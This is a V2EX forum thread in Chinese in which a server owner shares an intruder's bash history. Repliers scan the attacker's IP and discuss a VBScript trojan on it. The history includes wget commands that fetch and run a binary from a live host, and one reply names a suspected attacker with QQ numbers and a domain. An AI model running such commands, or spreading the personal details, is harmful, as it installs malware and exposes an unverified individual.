服务器连续两天被黑、第一次被挖矿、昨天又来、和第一次不同的是、居然有 history 记录、给各位老哥看看，只图一乐

V2EX = way to explore

V2EX 是一个关于分享和探索的地方

现在注册

已注册用户请登录

这是一个创建于 1767 天前的主题，其中的信息可能已经有所发展或是发生改变。

从 17:01 开始

avatar

为了防止上面图片挂掉、文本如下

21 2020-01-06 09:44:38 crontab -e

22 2020-01-06 09:45:16 reboot

23 2020-01-06 09:47:02 top

24 2020-01-06 17:01:03 top

25 2020-01-06 17:01:11 ls -l /proc/3557/exe

26 2020-01-06 17:01:17 netstat -atulnp

27 2020-01-06 17:01:40 ls -l /proc/1211/exe

28 2020-01-06 17:01:44 kill -9 1211

29 2020-01-06 17:01:46 crontab -l

30 2020-01-06 17:01:47 crontab -r

31 2020-01-06 17:01:48 crontab -l

32 2020-01-06 17:01:50 cd /usr/bin/

33 2020-01-06 17:01:57 rm -rf ftucwfvnpb

34 2020-01-06 17:02:00 netstat -atulnp

35 2020-01-06 17:02:03 w

36 2020-01-06 17:02:05 cd /root/

37 2020-01-06 17:02:07 cd /bin/

38 2020-01-06 17:02:15 wget http://101.201.76.232:8082/java

39 2020-01-06 17:02:19 rm -rf java.1

40 2020-01-06 17:02:20 cd /root/

41 2020-01-06 17:02:21 cd /opt/

42 2020-01-06 17:02:31 wget http://101.201.76.232:8082/java

43 2020-01-06 17:02:35 chmod 777 java

44 2020-01-06 17:02:36 ./java

45 2020-01-06 17:02:38 cd /root/

46 2020-01-06 17:02:41 ps -xua

47 2020-01-06 17:03:28 netstat -atulnp

48 2020-01-06 17:03:47 kill -9 4689

49 2020-01-06 17:03:51 netstat -atulnp

50 2020-01-06 17:04:02 cd /etc/

51 2020-01-06 17:04:11 kill -9 6161;kill -9 6163

52 2020-01-06 17:04:15 rm -rf java

53 2020-01-06 17:04:16 cd /root/

54 2020-01-06 17:04:17 cd /bin/

55 2020-01-06 17:04:22 wget http://101.201.76.232:8082/java

56 2020-01-06 17:04:28 rm -rf java.1

57 2020-01-06 17:04:30 cd /root/

58 2020-01-06 17:04:31 cd /opt/

59 2020-01-06 17:04:33 wget http://101.201.76.232:8082/java

60 2020-01-06 17:04:36 chmod 777 java

61 2020-01-06 17:04:39 ./java

62 2020-01-06 17:04:42 cd /root/

63 2020-01-06 17:04:44 netstat -atulnp

64 2020-01-06 17:04:51 ifconfig

65 2020-01-06 17:04:54 history

66 2020-01-06 17:05:01 netstat -atulnp

67 2020-01-06 17:05:42 cd /ro

68 2020-01-06 17:05:43 cd /root/

69 2020-01-06 17:05:46 history

70 2020-01-06 17:05:53 ifconfig

71 2020-01-06 17:05:54 history

72 2020-01-06 17:05:58 w

73 2020-01-06 17:06:00 history

74 2020-01-06 17:06:24 ifconfig

75 2020-01-06 17:06:27 history

76 2020-01-06 17:06:29 history

77 2020-01-06 17:06:29 history

第 1 条附言 · 2020-01-07 10:55:53 +08:00

附上这两天我自己服务器的资源截图、应该还是盗走了点东西、不过还好、没啥重要的

avatar

66 条回复 • 2020-01-11 14:16:59 +08:00

defunct9

2020-01-07 09:52:44 +08:00

有意思

dothis

2020-01-07 09:53:18 +08:00

里面还有这个人对应的云服务器地址手动狗头

ihciah

2020-01-07 09:54:26 +08:00 via iPhone

这是啥机器，挖出来的币有人工的时间值钱吗

mangoDB

2020-01-07 09:56:07 +08:00

感觉对方功夫不到家

avalon0624

2020-01-07 10:01:13 +08:00

居然用的还是国内的 ip 做，忘了服务器要实名的么？

dapang1221

2020-01-07 10:01:41 +08:00

这这这…纯手动的吗，真就服务器一日游啊，翻遍了。。。

yEhwG10ZJa83067x

2020-01-07 10:03:31 +08:00

http://101.201.76.232:8082
可以打开

oneisall8955

2020-01-07 10:04:58 +08:00 via Android

有趣有趣

moonheart

2020-01-07 10:10:23 +08:00

https://user-images.githubusercontent.com/15916990/71862696-acc76d80-3135-11ea-982d-1af3e0d41da1.png

dothis

2020-01-07 10:10:35 +08:00

@ihciah 我是腾讯云 2 核 8G5M 的机器

@mangoDB 哈哈、是的、我已经够菜了、他比我还菜

@avalon0624 是的、不过这不是最骚的、最骚的是还能访问、笑死了

@dapang1221 我也感觉、纯手动、第一次挖矿搞的还挺像样子的、这一次直接手动、并且最后好像是放弃了？因为这次好像没有成功植入病毒、只是腾讯云那边给了个提醒

dothis

2020-01-07 10:17:49 +08:00

@moonheart 系统里面没啥、就跑一些自己的小工具、多谢提醒

afirefish

2020-01-07 10:22:32 +08:00

北京阿里云？

ReZer0

2020-01-07 10:23:44 +08:00

话说我好奇的点在于是怎么被黑进去的……

rongyiran

2020-01-07 10:27:31 +08:00

用的是肉鸡控制你的啊.

gearfox

2020-01-07 10:28:13 +08:00

还是个爱打 cs 的朋友

dothis

2020-01-07 10:31:57 +08:00

@afirefish 是的、对方是北京阿里云

@ReZer0 目前我很怀疑是 BT 导致的、因为我自己的安装 BT 没多久、同时我们公司服务器、我也想安装一个 BT 想使用起来(图方便)、结果还没用、周末就中毒(就隔天)、很多文件都被删了。辛亏有快照、不然直接凉。目前只是解决问题。

mango88

2020-01-07 10:54:43 +08:00

惊了，CS

LengthMin

2020-01-07 10:56:02 +08:00

BT 是宝塔吗？

afirefish

2020-01-07 10:58:56 +08:00

@dothis BT 是宝塔吗？我一台腾讯云的服务器上面也跑了 BT，目前暂时还没有被黑过（或者是我菜，不知道被黑了）。不过我一般在腾讯云的安全组里面吧宝塔管理面板和 SSH 的端口都关了的，要用的时候再打开。

Pzqqt

2020-01-07 11:05:34 +08:00

@justrand 访问 http://101.201.76.232 之后返回 Nginx 欢迎页面然后火绒报毒。。。

dothis

2020-01-07 11:07:25 +08:00

@LengthMin @afirefish 是的、目前只是怀疑、因为时间上太巧了。

目前我本地服务器(linux)：完全按照官方要求、开了对应的端口；使用了 ftp、mysql 这些；
公司服务器(windows)：只是安装了宝塔、本地可以运行访问、外网 ip 和端口都没开、后来准备过两天用起来、就又把服务关闭了、隔天就中招

different

2020-01-07 11:10:10 +08:00

你也挺有意思，你的重点在于别人有多菜，而不是你的服务器怎么被别人黑进来了？

LengthMin

2020-01-07 11:14:48 +08:00

还有一个：之前看过一篇文章，因为宝塔里开启的 phpmyadmin 的 888 端口也是暴露在公网的，所以就怎么怎么怎么就进去 shell 了

dothis

2020-01-07 11:23:57 +08:00

@different 哈哈、老哥、我就是当一个笑话分享出来让大家一乐、我自己也很菜啊、不过感觉他的操作确实逗笑我了
原因有找过、不过就是因为我自己菜、没办法找到、不好意思、忘老哥谅解
公司服务器目前我只是反馈了一下我做了哪些操作、最终是由供应商去解决、也开会自我反省过了。

@LengthMin 多谢老哥、我去了解学习一下

opengps

2020-01-07 11:25:10 +08:00

公网环境就是这么恶劣，学学防御吧，最基本的：换端口，强密码，严格的防火墙

ZRS

2020-01-07 11:40:03 +08:00 via iPhone

怎么摸进来的

dorothyREN

2020-01-07 11:49:27 +08:00

我 sqlserver 1 号一大早被删库了。。。

shawshi

2020-01-07 12:02:51 +08:00

估计那个服务器还是肉鸡

shawshi

2020-01-07 12:03:03 +08:00

估计那个服务器也是肉鸡

AmosAlbert

2020-01-07 12:13:40 +08:00

看这操作，你的服务器成靶场了：）

guanhui07

2020-01-07 12:26:21 +08:00

阿里云..

darknoll

2020-01-07 12:48:13 +08:00

不是通过密码登录进来的？

no1xsyzy

2020-01-07 12:49:16 +08:00

http://101.201.76.232:8082 的 “HFS” 页面里面是没有显示 /java 的
但 :80 带 Trojan-Dropper.VBS.Agent （卡巴斯基）或者叫 TrojanDropper/Ramnit.f （火绒）
让我有点疑惑
直接报给 CNCERT 吧。

hiya5

2020-01-07 12:53:22 +08:00

他通过密码登录进来的吗

atonku

2020-01-07 13:21:23 +08:00

你黑不了他的服务器，所以你比他菜。

lostpg

2020-01-07 13:21:59 +08:00 via Android

感觉这是直接密码登 root 用户进来了，如果再是弱密码，不就是开着大门睡觉了。。。

dothis

2020-01-07 13:32:54 +08:00

@opengps 是的啊、经过这次事件、是要加强学习一下运维方面的知识了
@ZRS 不清楚、目前怀疑是因为宝塔、尝试找原因未找到
@dorothyREN 卧槽、你这比我更狠
@darknoll @hiya5 @lostpg 应该不是、我的密码很复杂
@atonku 哈哈、有道理。我收回之之前他比我菜的话。

Mogugugugu

2020-01-07 13:52:03 +08:00

http://101.201.76.232 是个 nginx 页面，用的是 tomcat 的 fav.ico ，然后右键看一下源码、有意思、

puzzle9

2020-01-07 14:17:48 +08:00

@Mogugugugu 确实有意思不过这种病毒对现代浏览器应该失效了把

xmi

2020-01-07 14:23:37 +08:00

@Pzqqt 我的也报毒了, 但是直接给放行了是什么情况? 有没有问题的?

songco

2020-01-07 15:16:55 +08:00

Starting Nmap ( https://nmap.org ) at 2020-01-07 09:14 EET
NSE: Loaded 40 scripts for scanning.
Initiating Ping Scan at 09:14
Scanning 101.201.76.232 [4 ports]
Completed Ping Scan at 09:14, 0.47s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 09:14
Scanning 101.201.76.232 [100 ports]
Discovered open port 1025/tcp on 101.201.76.232
Discovered open port 139/tcp on 101.201.76.232
Discovered open port 135/tcp on 101.201.76.232
Discovered open port 80/tcp on 101.201.76.232
Discovered open port 3389/tcp on 101.201.76.232
Discovered open port 1027/tcp on 101.201.76.232
Discovered open port 1026/tcp on 101.201.76.232
Completed SYN Stealth Scan at 09:14, 2.94s elapsed (100 total ports)
Initiating Service scan at 09:14
Scanning 7 services on 101.201.76.232
Completed Service scan at 09:15, 59.26s elapsed (7 services on 1 host)
NSE: Script scanning 101.201.76.232.
Initiating NSE at 09:15
Completed NSE at 09:15, 2.96s elapsed
Initiating NSE at 09:15
Completed NSE at 09:15, 0.00s elapsed
Nmap scan report for 101.201.76.232
Host is up (0.21s latency).
Not shown: 77 closed ports
PORT STATE SERVICE VERSION
80/tcp open http nginx 1.9.12
81/tcp filtered hosts2-ns
111/tcp filtered rpcbind
119/tcp filtered nntp
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
427/tcp filtered svrloc
445/tcp filtered microsoft-ds
515/tcp filtered printer
646/tcp filtered ldp
1025/tcp open msrpc Microsoft Windows RPC
1026/tcp open msrpc Microsoft Windows RPC
1027/tcp open msrpc Microsoft Windows RPC
1029/tcp filtered ms-lsa
3389/tcp open ms-wbt-server Microsoft Terminal Service
4899/tcp filtered radmin
5000/tcp filtered upnp
5101/tcp filtered admdog
5357/tcp filtered wsdapi
5800/tcp filtered vnc-http
5900/tcp filtered vnc
6001/tcp filtered X11:1
49152/tcp filtered unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.38 seconds
Raw packets sent: 182 (7.984KB) | Rcvd: 137 (5.516KB)

randomtree451

2020-01-07 15:30:07 +08:00

tengyoubiao

2020-01-07 15:50:25 +08:00

这是挂了个感染 HTML 的木马？

Achiii

2020-01-07 16:43:09 +08:00

试过被利用 tp 漏洞挂马，后来过滤 post 参数关键字解决的

black11black

2020-01-07 21:23:08 +08:00

老哥，说一下你这个查看用户历史记录的命令是啥呗

wqshare

2020-01-07 21:31:36 +08:00

看看这老哥的 80 端口页，用 vbs 挂了个马上去，哈哈

xupefei

2020-01-07 21:44:37 +08:00 via iPhone

不要对公网开 yarn 端口

rootx

2020-01-07 22:11:35 +08:00

dorothyREN

2020-01-08 00:55:30 +08:00

@dothis #37 数据库没备份，只有日志，恢复起来贼特么慢，搞了两天才恢复完数据

msg7086

2020-01-08 01:46:06 +08:00

公司服务器装宝塔？佩服佩服。

HTSdTt3WygdgQQGe

2020-01-08 02:12:03 +08:00 via Android

你马上报案，说数据库丢了价值一个亿的机密资料，让阿里去查

vvqqdd

2020-01-08 04:11:58 +08:00

这个服务器有个图片，点开是哥🐎，名字叫做 nknmn。。。顾名思义哈哈

KasuganoSoras

2020-01-08 04:56:49 +08:00

在他的服务器上看到一张图片叫 “战鹰部落 MC 服务器”，正好我也是开 MC 服务器的，好奇搜了一下，找到了他们的服务器，QQ 群是 139888565，群主 QQ 是 565621504，昵称叫 NullPointerException，结合前面执行的命令以及文件名里面都含有 Java，我觉得八九不离十，楼主有兴趣可以自己去会会他？

KasuganoSoras

2020-01-08 05:04:08 +08:00

https://www.mcbbs.net/thread-675592-1-1.html
2017 年的时候曾经在我的世界中文论坛发过贴说自己的服务器被 DDoS 了 9.6Gbps 流量，然后从他的个人空间找到一个域名 www.zhanyingwl.com ，打开发现 502，是 360 云盾的界面，然后我想了下既然是用的 360 CDN，那这域名肯定有备案吧。然后又去查了一下备案号，果然。
尹伊君个人鲁 ICP 备 18039840 号-1 战鹰网络技术站 www.zhanyingwl.com
只能帮你到这里了（笑

cydian

2020-01-08 06:12:17 +08:00 via Android

@KasuganoSoras 可以打开不是 502

webshe11

2020-01-08 08:17:53 +08:00

真就用宝塔呗

Pzqqt

2020-01-08 08:58:35 +08:00

@xmi 参考 38 楼病毒是藏在页面源码里的在页面源码下方有一段恶意 VBScript 代码可以看出这段代码只对 Windows 系统有影响

dothis

2020-01-08 08:58:44 +08:00

@black11black 终端下直接敲 history 就可以看
@msg7086 我自己服务器用的、感觉贼舒服、然后公司的服务器也想用、最后没用起来就凉了、以后不敢用这些东西了、自己玩玩还行
@dorothyREN。。。这就很难受了、我这边有快照、简单很多
@KasuganoSoras 卧槽、老哥稳、多谢了